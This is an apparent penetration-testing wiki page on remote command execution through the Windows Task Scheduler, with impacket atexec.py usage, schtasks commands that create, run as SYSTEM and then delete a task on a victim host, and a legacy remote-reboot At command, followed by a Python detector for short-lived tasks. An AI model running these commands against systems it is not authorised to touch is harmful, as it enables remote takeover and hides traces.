# ATExec / SchTaskExec

{% hint style="warning" %}
Administrator rights on the target machine are mandatory.
{% endhint %}

SchTasks is short for Scheduled Tasks. The Task Scheduler service is reached over DCE/RPC: communication starts on port 135 and then continues on an ephemeral port. Similar to creating a cron job in Linux, you can schedule a task to run whatever action you want at a chosen time.

{% tabs %}
{% tab title="UNIX" %}

```bash
# Executes a command on the target machine via the Task Scheduler service and returns the output of the executed command.
atexec.py domain/user:password@IP <command>
```

{% endtab %}

{% tab title="Windows" %}

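```powershell
# Create a one-shot task on the remote host that runs as SYSTEM
schtasks /create /tn <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
# Trigger the task immediately instead of waiting for the scheduled time
schtasks /run /tn <TASK_NAME> /S <VICTIM>
# Delete the task without a confirmation prompt
schtasks /F /delete /tn <TASK_NAME> /S <VICTIM>
```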

```powershell
# Legacy at.exe syntax (deprecated since Windows 8 / Server 2012)
At \\<IP> 11:00:00PM shutdown -r
```

{% endtab %}
{% endtabs %}
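From the defender's side, the create/run/delete sequence in the Windows tab leaves a task that exists for only a few seconds. The following added example (not part of the original page) correlates Security log events 4698 (scheduled task created) and 4699 (scheduled task deleted) to surface such short-lived tasks; the record field names, the sample events and the 60-second threshold are assumptions made for illustration.

```python
from datetime import datetime, timedelta

# Windows Security log event IDs; both require the
# "Audit Other Object Access Events" policy to be enabled.
TASK_CREATED, TASK_DELETED = 4698, 4699

# Constructed sample records, already reduced to the fields used here
# (field names are hypothetical, not a real export schema).
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:00", "host": "SRV01", "id": 4698,
     "task": "\\BackupNightly", "user": "CORP\\svc_backup"},
    {"time": "2024-05-01T10:15:02", "host": "WS07", "id": 4698,
     "task": "\\kQzLmPwa", "user": "CORP\\admin1"},
    {"time": "2024-05-01T10:15:05", "host": "WS07", "id": 4699,
     "task": "\\kQzLmPwa", "user": "CORP\\admin1"},
    {"time": "2024-05-03T09:00:00", "host": "SRV01", "id": 4699,
     "task": "\\BackupNightly", "user": "CORP\\svc_backup"},
]


def short_lived_tasks(events, max_lifetime=timedelta(seconds=60)):
    """Return tasks created and deleted on the same host within max_lifetime."""
    created = {}    # (host, task name) -> (creation time, creating account)
    findings = []
    # ISO 8601 timestamps in one format sort correctly as strings.
    for ev in sorted(events, key=lambda e: e["time"]):
        key = (ev["host"], ev["task"])
        when = datetime.fromisoformat(ev["time"])
        if ev["id"] == TASK_CREATED:
            created[key] = (when, ev["user"])
        elif ev["id"] == TASK_DELETED and key in created:
            start, creator = created.pop(key)
            lifetime = when - start
            if lifetime <= max_lifetime:
                findings.append({"host": ev["host"], "task": ev["task"],
                                 "created_by": creator,
                                 "lifetime_s": lifetime.total_seconds()})
    return findings


if __name__ == "__main__":
    for hit in short_lived_tasks(SAMPLE_EVENTS):
        print(hit)
```

The long-lived `\BackupNightly` task is ignored, while the task on `WS07` that lived for three seconds is reported.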

## References

{% embed url="https://book.hacktricks.xyz/windows-hardening/ntlm/atexec" %}
